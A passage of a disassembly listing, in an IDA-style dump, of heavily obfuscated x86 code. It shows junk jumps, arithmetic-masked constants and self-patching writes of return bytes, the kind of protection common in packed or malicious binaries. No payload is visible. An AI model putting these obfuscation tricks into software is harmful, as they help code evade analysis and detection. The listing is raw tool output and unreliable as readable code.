; START	OF FUNCTION CHUNK FOR sub_445B38

loc_44E5AE:				; CODE XREF: sub_445B38+17j
		jnz	loc_4565B8
		jmp	loc_457F02
; END OF FUNCTION CHUNK	FOR sub_445B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_44E5B9:				; CODE XREF: sub_4429DD+1611Ej
		mov	esi, ebx
		xchg	esi, [esp-4+arg_0]
		push	0E79FCEF0h
		xchg	ebp, [esp+0]
		mov	ebx, ebp
		pop	ebp
		jmp	loc_455427
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45913D

loc_44E5CE:				; CODE XREF: sub_45913D-1079Fj
		sub	esi, ecx
		jmp	loc_43B88E
; END OF FUNCTION CHUNK	FOR sub_45913D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_352. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B75

loc_44E5D6:				; CODE XREF: sub_452B75:loc_452B80j
		jmp	nullsub_380
; END OF FUNCTION CHUNK	FOR sub_452B75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_44E5DB:				; CODE XREF: sub_449C4F+80B9j
					; sub_44F3F5+3201j
		jmp	loc_44A673
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; ---------------------------------------------------------------------------

loc_44E5E0:				; CODE XREF: y2kk37jd:004465FBj
		jmp	locret_43B9CE

; =============== S U B	R O U T	I N E =======================================



sub_44E5E5	proc near		; CODE XREF: sub_43CB02+Ep
					; y2kk37jd:0043DE48j ...

; FUNCTION CHUNK AT 0043BF83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E4C7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E4DA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F1BE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004415AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E11 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00453A48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454362 SIZE 0000000F BYTES

		jns	sub_43F1C4

loc_44E5EB:				; CODE XREF: y2kk37jd:00446992j
		call	sub_4577FE
		jmp	loc_43BF83
sub_44E5E5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F34

loc_44E5F5:				; CODE XREF: sub_450F34:loc_44E2ABj
		pop	ecx
		xchg	ebp, [esp-4+arg_0]
		mov	esi, ebp
		pop	ebp
		pop	ebp
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_450F34
; ---------------------------------------------------------------------------

loc_44E602:				; CODE XREF: y2kk37jd:0044B033j
		xor	ebx, 3321378Fh
		call	sub_44B663
; START	OF FUNCTION CHUNK FOR sub_446052

loc_44E60D:				; CODE XREF: sub_446052+9j
		jmp	loc_4553BF
; END OF FUNCTION CHUNK	FOR sub_446052
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_273. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE7D

loc_44E613:				; CODE XREF: sub_45BE7D:loc_45BE84j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_45BE7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_44E618:				; CODE XREF: sub_4490B4-971Dj
		jmp	loc_45B515
; END OF FUNCTION CHUNK	FOR sub_4490B4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_431. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_44E61E:				; CODE XREF: sub_43E0DE+178FBj
		mov	[ebp+0], ecx
		jmp	loc_455CAB
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; ---------------------------------------------------------------------------
		mov	ds:off_41E0A8, eax
		lea	eax, loc_458736
		mov	byte ptr [eax],	0C3h
		jmp	loc_4422D3

; =============== S U B	R O U T	I N E =======================================



sub_44E63A	proc near		; CODE XREF: sub_410A9C+78p
					; y2kk37jd:00446C65j
					; DATA XREF: ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C8D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D227 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440E6A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00441E93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446C6B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C0A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004517C2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045B07B SIZE 0000000F BYTES

		push	ecx
		push	4C0F05D1h
		xchg	edx, [esp+8+var_8]

loc_44E643:				; CODE XREF: y2kk37jd:loc_4571A1j
		jmp	loc_43C8D1
sub_44E63A	endp


; =============== S U B	R O U T	I N E =======================================



sub_44E648	proc near		; CODE XREF: y2kk37jd:004408FEj
					; sub_456A36+Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D512 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B337 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C008 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D0D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045583D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459363 SIZE 0000000F BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [esp-4+arg_0]
		push	ebp
		mov	ebp, edi
		jmp	loc_459363
sub_44E648	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_44E657:				; CODE XREF: sub_44DBF8:loc_442871j
		jnz	loc_43F5B0
		jmp	loc_45701C
; END OF FUNCTION CHUNK	FOR sub_44DBF8

; =============== S U B	R O U T	I N E =======================================



sub_44E662	proc near		; DATA XREF: y2kk37jd:0045541Do
		call	sub_44E677
		retn
sub_44E662	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44E668:				; CODE XREF: sub_445226+E1F6j
		jmp	loc_43C060
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44E66D:				; CODE XREF: y2kk37jd:004430C8j
		jmp	sub_445C40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459035

loc_44E672:				; CODE XREF: sub_459035-1DAB8j
		jmp	nullsub_265
; END OF FUNCTION CHUNK	FOR sub_459035

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44E677	proc near		; CODE XREF: sub_44E662p

arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0043DAF5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441F9C SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	eax, [esp-8+arg_0]
		push	eax
		jmp	loc_441F9C
sub_44E677	endp

; ---------------------------------------------------------------------------

loc_44E686:				; DATA XREF: sub_459724+1o
		push	0F16E9C8Bh
		pop	edi
		and	edi, 0C8A7EE5Ah
		xor	edi, 0DC1FCA47h
		sub	edi, 0EA4356DAh
		jmp	loc_44C6F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456990

loc_44E6A3:				; CODE XREF: sub_456990+12j
		test	ebx, 1000h
		jmp	loc_4432C2
; END OF FUNCTION CHUNK	FOR sub_456990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44E6AE:				; CODE XREF: sub_43F911+15128j
		jnb	loc_444FB9
		add	eax, edi
		jmp	loc_44FC17
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------

loc_44E6BB:				; CODE XREF: y2kk37jd:00455272j
		mov	[eax], esi
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44E6BD:				; CODE XREF: sub_4458DD+F988j
		add	eax, 747BCC71h
		test	eax, 4
		jmp	loc_43D667
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_44E6CE:				; CODE XREF: sub_443BAF:loc_441990j
		jz	loc_445068
		jmp	loc_441971
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_44E6D9:				; CODE XREF: sub_44AC89-D087j
		and	eax, 0FAD21324h

loc_44E6DF:				; CODE XREF: sub_44AC89:loc_444625j
		pop	large dword ptr	fs:0
		push	offset sub_43EBAB
		jmp	nullsub_284
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4531A2

loc_44E6F0:				; CODE XREF: sub_4531A2:loc_44CE22j
		pop	eax
		sub	edi, 8E17871Eh
		add	edi, 0B2B7F07Ah
		xchg	edi, [esp-4+arg_0]
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_4531A2
; ---------------------------------------------------------------------------
		mov	edx, 3CC6743Ch
		jmp	loc_44AD3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456990

loc_44E70F:				; CODE XREF: sub_456990+2177j
		push	80578BADh
		mov	[esi], edi
		xchg	ecx, edx
		jmp	loc_445B62
; END OF FUNCTION CHUNK	FOR sub_456990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_44E71D:				; CODE XREF: sub_454C24+8j
		sub	al, 99h
		jmp	loc_444701
; END OF FUNCTION CHUNK	FOR sub_454C24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0F1

loc_44E725:				; CODE XREF: sub_44D0F1+Ej
		jmp	nullsub_304
; END OF FUNCTION CHUNK	FOR sub_44D0F1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_420. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44E72B:				; CODE XREF: sub_43C851+9E8Aj
					; sub_43F75D+133DAj
		jmp	loc_4558E9
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_44E730:				; CODE XREF: sub_44D627:loc_44645Aj
					; sub_44F309+Dj
		jz	loc_45C17F
		jmp	loc_45B0E7
; END OF FUNCTION CHUNK	FOR sub_44D627

; =============== S U B	R O U T	I N E =======================================



sub_44E73B	proc near		; DATA XREF: y2kk37jd:00443648o
		add	edx, 0EFF3028Eh
		call	sub_45104A
sub_44E73B	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445226

loc_44E746:				; CODE XREF: sub_445226+157EBj
		jz	loc_44FC3B
		jmp	loc_45A231
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		and	edx, 810E779Dh
		jo	loc_449CC1
		jmp	sub_45BEC4
; ---------------------------------------------------------------------------

loc_44E762:				; CODE XREF: y2kk37jd:loc_43E00Ej
		jnz	loc_441A75
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_44E768:				; CODE XREF: sub_456A36+1Ej
		jmp	loc_445634
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44E76D:				; CODE XREF: sub_43ED19+158FFj
					; sub_445226:loc_45836Dj
		jmp	loc_45A5F0
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_44E772:				; CODE XREF: y2kk37jd:00451A25j
		jmp	sub_442F52
; ---------------------------------------------------------------------------
		and	ebx, esi
		jmp	loc_441A6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44E77E:				; CODE XREF: sub_45B7AA:loc_456FECj
		call	sub_448159

loc_44E783:				; CODE XREF: sub_44001E+1664Aj
		jmp	loc_44ABED
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_44E788:				; CODE XREF: y2kk37jd:00441D34j
		jmp	loc_444D01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1E6

loc_44E78D:				; CODE XREF: sub_43B1E6+7j
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_43B1E6
; ---------------------------------------------------------------------------

loc_44E792:				; CODE XREF: y2kk37jd:004500B0j
		popf
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_44E793:				; CODE XREF: sub_43D41D:loc_45009Cj
		xor	eax, 3405BC7Dh
		add	eax, 8283F57Eh
		push	edx
		pushf
		jmp	loc_448D0E
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------

loc_44E7A6:				; CODE XREF: y2kk37jd:0044BBCBj
		not	edi
		xchg	ecx, eax
		jmp	sub_43D8D9

; =============== S U B	R O U T	I N E =======================================



sub_44E7AF	proc near		; CODE XREF: y2kk37jd:0043BF10j
					; sub_43BD78+5FE7p
		xchg	eax, [esp+0]
		pop	eax
		add	ecx, 0F1A4255Fh
		push	offset sub_456E55
		jmp	nullsub_465
sub_44E7AF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_44E7C3:				; CODE XREF: sub_449DFE:loc_446BBFj
		jge	loc_43FCD4
; END OF FUNCTION CHUNK	FOR sub_449DFE
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_44E7C9:				; CODE XREF: sub_4514DE:loc_443F4Fj
		jmp	loc_444DB8
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		test	ebx, eax
		jmp	loc_43B735
; ---------------------------------------------------------------------------
		ja	loc_459EC8
		jmp	sub_458713
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44E7E0:				; CODE XREF: sub_445226:loc_453F43j
		jnz	loc_456498
		popf
		rol	esi, 1Bh
		shr	esi, 10h
		jmp	loc_456498
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_44E7F2:				; CODE XREF: sub_4490B4-263Dj
		pop	ecx
		jmp	loc_43F988
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44E7F8:				; CODE XREF: sub_445226-3C9Fj
		pushf
		xchg	ebp, edx
		adc	eax, ebp

loc_44E7FD:				; CODE XREF: sub_445226:loc_454687j
		push	625D9DE3h
		pop	eax
		jmp	loc_446BB5
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_44E808:				; CODE XREF: sub_4553C1-F39Bj
		jz	loc_43E351
		jmp	loc_44E979
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451964

loc_44E813:				; CODE XREF: sub_451964-A97Ej
		jz	loc_45658A
		add	edx, 0BE57AAB4h
		jb	loc_4554C8
		jmp	loc_45658A
; END OF FUNCTION CHUNK	FOR sub_451964
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_355. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_44E82B:				; CODE XREF: sub_4514DE+9B4Cj
		jmp	loc_454A50
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_44E830:				; CODE XREF: sub_4599BE:loc_44577Dj
		xchg	ebp, [esp+4+var_4]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_4468AA
; END OF FUNCTION CHUNK	FOR sub_4599BE

; =============== S U B	R O U T	I N E =======================================



sub_44E840	proc near		; CODE XREF: sub_452912+11j

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F9F5 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004413B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441E8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445CFB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448287 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004522C1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452F89 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045777F SIZE 0000001A BYTES

		push	ebx
		push	0E28F4016h
		pop	ebx
		and	ebx, 22DAAE8Ch
		jnz	loc_452F89

loc_44E853:				; CODE XREF: sub_44D8CE+77F3j
		jmp	loc_4522C1
sub_44E840	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sbb	ebp, esi
		shr	esi, 7
		popf
		jmp	loc_452E26
; ---------------------------------------------------------------------------

loc_44E863:				; CODE XREF: y2kk37jd:004591EAj
		jge	loc_43CC3C
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_44E86A:				; CODE XREF: sub_4562E5:loc_4591D1j
		rol	esi, 9
		cmp	esi, 0F23E84C5h
		jmp	loc_45A8B8
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------

loc_44E878:				; CODE XREF: y2kk37jd:00456926j
		mov	eax, 0E211C416h
		call	sub_440337
		push	offset sub_4406A2
		jmp	loc_43F9EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BE53

loc_44E88C:				; CODE XREF: sub_43BE53:loc_441813j
		call	sub_4487FD
		mov	eax, 0F75CA70h
		push	offset loc_454657
		jmp	nullsub_86
; END OF FUNCTION CHUNK	FOR sub_43BE53
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E104
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_44E8A6:				; CODE XREF: sub_4518C3+3j
		jmp	loc_44C9AD
; END OF FUNCTION CHUNK	FOR sub_4518C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_261. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	al, 24h
		mov	edx, ecx
		pop	ecx
		jb	loc_44B722
		mov	eax, [esp]
		push	ecx
		jmp	loc_454FA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_44E8C0:				; CODE XREF: sub_43DE8B+31CAj
		mov	eax, ds:dword_4516D8
		or	eax, eax
		jnz	loc_43EB9E
		jmp	loc_45356D
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_44E8D3:				; CODE XREF: sub_4468E0:loc_45BDA8j
		call	sub_43BE53

loc_44E8D8:				; CODE XREF: sub_442B26+10282j
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BC82

loc_44E8DD:				; CODE XREF: sub_43BC82:loc_43BC88j
		jmp	nullsub_131
; END OF FUNCTION CHUNK	FOR sub_43BC82
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_44E8E2:				; CODE XREF: sub_442829+Cj
		or	eax, eax
		jnz	loc_43CC65
		jmp	loc_450BD1
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
		jb	loc_45661E
		jmp	sub_451FCB
; ---------------------------------------------------------------------------
		mov	eax, 1C5E06BAh
		call	sub_442C3E
		push	edi
		push	0F3FBD4DBh
		pop	edi
		rol	edi, 2
		add	edi, 30528DA5h
		mov	[edi], eax
		jmp	loc_447856
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_44E91B:				; CODE XREF: sub_43B163:loc_445675j
		jz	loc_44D501
		jmp	loc_445848
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_44E926:				; CODE XREF: sub_4466E0:loc_457547j
		xchg	ecx, [edx]
		jmp	loc_444D0C
; END OF FUNCTION CHUNK	FOR sub_4466E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FDF

loc_44E92D:				; CODE XREF: sub_440FDF:loc_441D9Cj
		rol	esi, 1Dh
		add	esi, 1049D5BBh
		mov	[esi], eax
		pop	esi
		jmp	loc_446E9C
; END OF FUNCTION CHUNK	FOR sub_440FDF
; ---------------------------------------------------------------------------

loc_44E93E:				; CODE XREF: y2kk37jd:0043CD04j
		call	sub_440CD1

loc_44E943:				; CODE XREF: y2kk37jd:loc_44F9B1j
		push	offset sub_4473CD
		jmp	loc_43B5C6
; ---------------------------------------------------------------------------

loc_44E94D:				; DATA XREF: sub_441070+2o
		push	edi
		push	1E720FADh
		pop	edi
		and	edi, 0ABCC8B69h
		jmp	loc_45C446

; =============== S U B	R O U T	I N E =======================================



sub_44E95F	proc near		; CODE XREF: y2kk37jd:loc_44D3CBj
					; y2kk37jd:00454668p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0C3h
		jmp	loc_4414F4
sub_44E95F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5BD

loc_44E96B:				; CODE XREF: sub_43F5BD:loc_44900Dj
		pop	edx
		mov	eax, [esp+0]
		push	offset loc_4560BD
		jmp	nullsub_266
; END OF FUNCTION CHUNK	FOR sub_43F5BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_44E979:				; CODE XREF: sub_4553C1-6BB3j
		xchg	eax, ecx
		test	esi, 578D7C2Dh
		jmp	loc_447FA8
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44E986:				; CODE XREF: sub_4411C3-5D23j
		call	sub_454D0F
		mov	eax, 0B4B93D2h
		push	offset sub_459168
		jmp	loc_44C0C3
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454210

loc_44E99A:				; CODE XREF: sub_454210-8A41j
		lea	eax, nullsub_1
		mov	byte ptr [eax],	0C3h
		jmp	loc_455FB1
; END OF FUNCTION CHUNK	FOR sub_454210

; =============== S U B	R O U T	I N E =======================================



sub_44E9A8	proc near		; DATA XREF: .data:off_428168o

; FUNCTION CHUNK AT 0043F546 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D9AC SIZE 00000005 BYTES

		push	edi
		push	9C41BBDAh
		pop	edi
		sub	edi, 0EE8F83E6h
		jmp	loc_43F546
sub_44E9A8	endp


; =============== S U B	R O U T	I N E =======================================



sub_44E9BA	proc near		; CODE XREF: sub_44EC21-908Ep
					; y2kk37jd:004560B8j

; FUNCTION CHUNK AT 00451C0A SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	[edx], eax
		pop	edx
		call	sub_459AFA
		dec	eax
		push	77604A58h
		jmp	loc_451C0A
sub_44E9BA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	ebx, edi
		jmp	sub_44D8CE
; ---------------------------------------------------------------------------
		mov	edx, 0DE6CF580h
		call	sub_440CD1
		push	eax
		ror	eax, 0Ah
		mov	ds:dword_44585C, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_44E9ED:				; CODE XREF: y2kk37jd:loc_455314j
					; sub_4562E5-1B4j
		jmp	loc_4591D1
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E456

loc_44E9F2:				; CODE XREF: sub_43E456+C3F8j
		jmp	loc_4452B7
; END OF FUNCTION CHUNK	FOR sub_43E456
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460D0

loc_44E9F7:				; CODE XREF: sub_4460D0+2154j
					; sub_44B79D+Fj
		rol	eax, 0Ah
		jmp	loc_4573BB
; END OF FUNCTION CHUNK	FOR sub_4460D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44E9FF:				; CODE XREF: sub_4577FEj
		push	50CB6F2h
		pop	eax
		or	eax, 22CBD703h
		rol	eax, 0Fh
		or	eax, 0AA3165FAh
		rol	eax, 1Ah
		add	eax, 547E29h
		mov	eax, [eax]
		jmp	loc_43DCE2
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44EA24:				; CODE XREF: sub_453867-10888j
		jnz	loc_43F510
		jmp	loc_44AA2F
; END OF FUNCTION CHUNK	FOR sub_453867
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_404. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44EA30:				; CODE XREF: sub_43F8B8+14790j
		jmp	nullsub_375
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_44EA35:				; CODE XREF: sub_44A33C+9566j
		jmp	loc_44B065
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44EA3A:				; CODE XREF: sub_445226+F0j
		jmp	loc_44F6E1
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		ror	ebp, 9
		jmp	sub_451964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44EA47:				; CODE XREF: sub_43BD0D:loc_44228Dj
		push	ecx
		push	0A07186E7h
		pop	ecx
		and	ecx, 9949DA63h
		rol	ecx, 3
		jmp	loc_44DA11
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_436. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_44EA5D:				; CODE XREF: sub_442EB4+9184j
		push	0BAA884C2h
		pop	eax
		sub	eax, 0B174A733h
		and	eax, 76421429h
		add	eax, 0DF34B0ACh
		add	eax, ebp
		add	eax, 20C93B53h
		jmp	loc_45A6EF
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------

loc_44EA82:				; CODE XREF: y2kk37jd:loc_454B56j
		mov	ebp, edi
		pop	edi
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44EA85:				; CODE XREF: sub_44B814:loc_43B2B5j
		push	ds:dword_44FC84
		retn
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44EA8C:				; CODE XREF: sub_43F75D+D60Bj
		jmp	loc_43CE24
; END OF FUNCTION CHUNK	FOR sub_43F75D

; =============== S U B	R O U T	I N E =======================================



sub_44EA91	proc near		; CODE XREF: y2kk37jd:00442A1Ep

; FUNCTION CHUNK AT 0044DB91 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A342 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_45A342
sub_44EA91	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_44EA97:				; CODE XREF: sub_449C4F:loc_443CE5j
		add	esi, 0FDF8AE87h
		jmp	loc_458A2F
; END OF FUNCTION CHUNK	FOR sub_449C4F

; =============== S U B	R O U T	I N E =======================================



sub_44EAA2	proc near		; DATA XREF: sub_4507BF:loc_43E937o

; FUNCTION CHUNK AT 0043C1A9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004400E7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044121D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446EA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F1F1 SIZE 00000019 BYTES

		xor	eax, 2A5F14D3h
		jnz	loc_44F1F1
		ror	eax, 7
		sub	eax, 0E090501Eh
		mov	edx, [esp+0]
		push	ebx
		mov	ebx, edi
		jmp	loc_44121D
sub_44EAA2	endp

; ---------------------------------------------------------------------------
		test	ecx, ebp
		jmp	loc_44E4E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_44EAC9:				; CODE XREF: sub_448700+4157j
		and	edi, 0F8FDC71Eh
		jmp	loc_443B6E
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F30

loc_44EAD4:				; CODE XREF: sub_441F30+17668j
		push	edi
		mov	edi, edx
		xchg	edi, [esp+0]
		call	sub_45ADEC
		push	0B0364B00h
		mov	eax, 54E2E25Dh
		jmp	loc_44C50A
; END OF FUNCTION CHUNK	FOR sub_441F30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

